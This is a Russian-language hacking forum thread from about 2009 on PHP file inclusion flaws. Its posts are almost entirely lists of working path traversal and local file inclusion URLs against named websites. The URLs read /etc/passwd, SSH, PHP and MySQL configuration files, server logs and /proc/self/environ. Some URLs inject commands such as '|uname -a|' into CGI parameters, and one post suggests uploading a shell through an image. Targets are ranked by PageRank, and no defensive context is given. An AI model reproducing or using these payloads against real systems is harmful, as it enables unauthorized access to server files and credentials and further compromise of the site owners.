PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. nik3241

    nik3241 Member

    Joined:
    4 Mar 2008
    Messages:
    0
    Likes Received:
    13
    Reputations:
    0
    сайт по борьбе с торчками

    Code:
    http://nobf.ru/index.php/download.php?file=../../../../../../etc/passwd
     
    3 people like this.
  2. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Code:
    http://ezonet.ru/reports.php?page=../index.php
    Code:
    http://www.911pcar.com/index.php?page=../../../etc/passwd
    Code:
    http://aplus-computer.net/myspacegraphicshelper/onlinepss//index.php?page=../index.php
     
    #902 RulleR, 6 Jun 2009
    Last edited by a moderator: 6 Jun 2009
    2 people like this.
  3. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 4]
    Code:
    http://triod.kiev.ua/index.php?page=index.php
    [PR 4]
    Code:
    http://www.chicagohungarians.com/index.php?page=/etc/passwd
    [PR 3]
    Code:
    http://www.dbd.com.au/index.php?page=index.php
    [PR 0]
    Code:
    http://legeartis-stom.com/index.php?page=/etc/passwd
     
    #903 RulleR, 8 Jun 2009
    Last edited by a moderator: 8 Jun 2009
    1 person likes this.
  4. BHYCHIK

    BHYCHIK Member

    Joined:
    30 Jan 2009
    Messages:
    52
    Likes Received:
    28
    Reputations:
    9
    http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

    Директория сайта: /usr/www/cyl.ru/www/
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.lohuis.ro/index.php?page=../../../../../../../../../../etc/passwd%00
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    На баяны не проверял:
    Code:
    http://www.americascup.com/es/acmag/votre_interview/index.php?idContent=12688&idIndex=../../../../../../../../../../etc/passwd%00
    
    http://www.clubedoexercito.com.br/index.php?arq=/home/httpd/vhosts/clubedoexercito.com.br/httpdocs/index
    
    http://www.inoticia.com.br/index.php?arq=/home/httpd/vhosts/inoticia.com.br/httpdocs/config/config
    
    http://www.aciub.com.br/index.php?arq=/var/www/dominios/www.aciub.com.br/site/index
    
    http://www.coacyle.com/index.php?sec=D:%5CTrabajos%5Cwwwcoacyle%5Ccontrol%5Cincludes%5Cfunciones&id=81
    
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    http://www.dalcomstechnologies.com/products.php?id=[LFI]
     
    1 person likes this.
  8. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    PR 4
    http://toyota.mnc.ru/?path=../../../etc/&file=passwd


    PR 3
    http://www.divetrade.ru/magazin/index.php?page=../../../../../../../../../../etc/passwd
    (онлайн шоп на FreeBSD)

    PR 3
    http://www.autosport.com.ua/index.php?part=FAU&page=../../../../../../../../../../../etc/passwd

    PR 3
    http://www.alpha-sport.ru/index.php?page=index.php

    PR 2
    http://www.basegroup.su/index.php?Page=/../../../../../../../../../../../etc/passwd
     
    #908 [aywo], 16 Jun 2009
    Last edited: 16 Jun 2009
    1 person likes this.
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.ahoj-brause.de/produkte.php?id=3&sub=[LFI]
     
  10. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    PR4
    Code:
    http://tunguska.sai.msu.ru/index.php?q=[LFI]
    PR0
    Code:
    http://obti.com.ua/modules/mod_focalizar_ajaxmodule/js/file_includer.php?file=[LFI]
    
    http://www.uspeh-b.ru/modules/mod_focalizar_ajaxmodule/js/file_includer.php?file=[LFI]
     
    1 person likes this.
  11. Adm1n4eG

    Adm1n4eG Member

    Joined:
    27 Mar 2009
    Messages:
    24
    Likes Received:
    13
    Reputations:
    6
    Code:
    http://www.govor.ru/visit/tours/i mg.php?location=/etc/passwd
    сохраняем и открываем...
     
    1 person likes this.
  12. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    PR2
    Code:
    http://catviz.sourceforge.net/index.php?userman_form=../../../../../../../../../../../../../etc/passwd
     
  13. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    gaff
     
    1 person likes this.
  14. Dj-Matrix

    Dj-Matrix New Member

    Joined:
    7 Nov 2008
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    http://www.midland.edu/success/students.php?page=../../robots.txt
     
    1 person likes this.
  15. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://inss.ru/index.php?id=index.php
     
  16. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    [​IMG]

    PR3
    Code:
    http://www.galileo-tv.ru/inner.php?page=[LFI]
    Можно через картинку залить shell
     
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Немножко инъекций и читалок, включая слепые, скорее всего многого не было, т.к. пока не видел еще сканеров, когда ошибки не выводятся:

    Code:
    http://www.pudasjarvi.fi/deutsch/index.php?file=/etc/passwd
    http://www.pudasjarvi.fi/deutsch/index.php?file=/usr/local/apache/logs/access_log
    http://www.pudasjarvi.fi/deutsch/index.php?file=/usr/local/apache/logs/error_log
    ----------------------------
    http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/passwd
    http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/ssh/sshd_config
    http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf
    http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/mysql/my.cnf
    -----------------------------
    http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/passwd
    http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
    http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/my.cnf
    http://www.stilmoebel.org/index.php?page=../../../../../../../../../../usr/bin/grep
    
    -----------------------------
    http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/passwd
    http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
    http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/apache2/httpd.conf
    http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/mysql/my.cnf
    http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/proftpd/modules.conf
    
    -----------------------------
    http://burg-pension.de/index.php?page=../../../../../../../../../../etc/passwd
    http://burg-pension.de/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
    http://burg-pension.de/index.php?page=../../../../../../../../../../etc/apache2/httpd.conf
    http://burg-pension.de/index.php?page=../../../../../../../../../../etc/mysql/my.cnf
    http://burg-pension.de/index.php?page=../../../../../../../../../../etc/proftpd/modules.conf
    
    -----------------------------
    http://www.bird.org.tw/index.php?block=../../../../etc/passwd
    http://www.bird.org.tw/index.php?block=../../../../etc/ssh/sshd_config
    -----------------------------
    http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/passwd
    http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/ssh/sshd_config
    http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/mysql/my.cnf
    http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/proftpd/modules.conf
    -----------------------------
    http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/passwd
    http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/ssh/sshd_config
    http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf
    http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/php.ini
    http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/my.cnf
    -----------------------------
    http://www.tonie.net/index.php?p=../../../../../../../etc/passwd
    http://www.tonie.net/index.php?p=../../../../../../../etc/ssh/sshd_config
    http://www.tonie.net/index.php?p=../../../../../../../etc/apache2/httpd.conf
    http://www.tonie.net/index.php?p=../../../../../../../etc/mysql/my.cnf
    http://www.tonie.net/index.php?p=../../../../../../../etc/vsftpd.conf
    ------------------------------
    -----------------------------
    http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
    http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/ssh/sshd_config
    http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/php/php.ini
    http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../usr/bin/grep
    -----------------------------
    http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/passwd
    http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../proc/self/environ
    http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/ssh/sshd_config
    -----------------------------
    http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/passwd
    http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../proc/self/environ
    http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/httpd/conf/httpd.conf
    http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../usr/local/etc/php.ini
    http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/my.cnf
    http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/logrotate.d/vsftpd.log
    -----------------------------
    http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../etc/passwd
    http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/logs/access_log
    http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/logs/error_log
    http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/conf/httpd.conf
    http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/etc/httpd/conf/httpd.conf
    -------------------------------
    http://www.toshin.com/cgi-bin/news/headline/view.cgi?File=|uname%20-a|
    http://shimizu.dyndns.tv/simizu-t/cgi-bin/link.cgi?file=|uname%20-a|
    http://f22.aaa.livedoor.jp/~gbwars/cgi-bin/gbw/turn/chdata.cgi?file=|uname%20-a|
    http://www.nurs.or.jp/~siizuka/cgi-bin/download.cgi?file=|uname$IFS-a|
    -----------------------------
    http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/passwd
    http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../proc/self/environ
    http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/apache2/httpd.conf
    http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/php5/apache2/php.ini
    http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../usr/bin/grep
    -----------------------------
    http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/passwd
    http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../proc/self/environ
    http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/ssh/sshd_config
    http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/php5/apache2/php.ini
    http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/php5/cgi/php.ini
    http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/mysql/my.cnf
    http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/proftpd/modules.conf
    
     
    1 person likes this.
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    -----------------------------
    http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/passwd
    http://www.soccer7.org/show.pl?file=../../../../../../../../../proc/self/environ
    http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/httpd/access_log
    http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/httpd/error_log
    http://www.soccer7.org/show.pl?file=../../../../../../../../../usr/local/apache/conf/httpd.conf
    http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/php.ini
    http://www.soccer7.org/show.pl?file=../../../../../../../../../etc/my.cnf
    http://www.soccer7.org/show.pl?file=../../../../../../../../../var/log/maillog
    -----------------------------
    http://www.acomputerguy.org/index.php?file=../../../../../../../../../etc/passwd
    http://www.acomputerguy.org/index.php?file=../../../../../../../../../etc/ssh/sshd_config
    http://www.acomputerguy.org/index.php?file=../../../../../../../../../var/log/httpd/access.log
    http://www.acomputerguy.org/index.php?file=../../../../../../../../../usr/local/apache/conf/httpd.conf
    http://www.acomputerguy.org/index.php?file=../../../../../../../../../usr/local/etc/php.ini
    
     
  19. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/passwd
    http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/ssh/sshd_config
    http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../usr/local/etc/php.ini
    http://www.toebu.imschmatt.ch/gaestebuch/index-aaa.php?id=../../../../../etc/my.cnf
    ----

    http://tequilajazzz.com/zzz.php?zzz=zzz.php%00

    ---

    http://valganoored.leadmaster.pri.ee/?id=index.php%00

    ---

    http://radomiak.info/index.php?id=index.php%00

    ---

    http://www.classic-appraisals.com/?id=index.php
     
    #919 AlexSatter, 25 Jun 2009
    Last edited: 26 Jun 2009
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/passwd&top=self&bottom=self
    http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/ssh/sshd_config&top=self&bottom=self
    http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../usr/local/etc/php.ini&top=self&bottom=self
    http://www.mobyad.ru/cgi-bin/print-rus.cgi?doc=../../../../../../../etc/my.cnf&top=self&bottom=self
    ------------------------------
    http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/passwd&lang=german&source=index&title=Netboot-Spezifikation
    http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../proc/self/environ&lang=german&source=index&title=Netboot-Spezifikation
    http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/ssh/sshd_config&lang=german&source=index&title=Netboot-Spezifikation
    http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/httpd/conf/httpd.conf&lang=german&source=index&title=Netboot-Spezifikation
    http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/php.ini&lang=german&source=index&title=Netboot-Spezifikation
    http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/my.cnf&lang=german&source=index&title=Netboot-Spezifikation
    -----------------------------
    http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/passwd%00
    http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../proc/self/environ%00
    http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/ssh/sshd_config%00
    http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/httpd/conf/httpd.conf%00
    http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/php.ini%00
    http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/my.cnf%00
    http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../var/log/maillog%00
    -----------------------------
    http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/passwd%00
    http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../proc/self/environ%00
    http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/httpd/conf/httpd.conf%00
    http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/php.ini%00
    http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/my.cnf%00
    http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/logrotate.d/vsftpd.log%00
    -----------------------------
    http://www.bailii.org/cgi-bin/markup.cgi?doc=../../../../../etc/passwd
    http://www.bailii.org/cgi-bin/markup.cgi?doc=../../../../../proc/self/environ
    
    
     
    1 person likes this.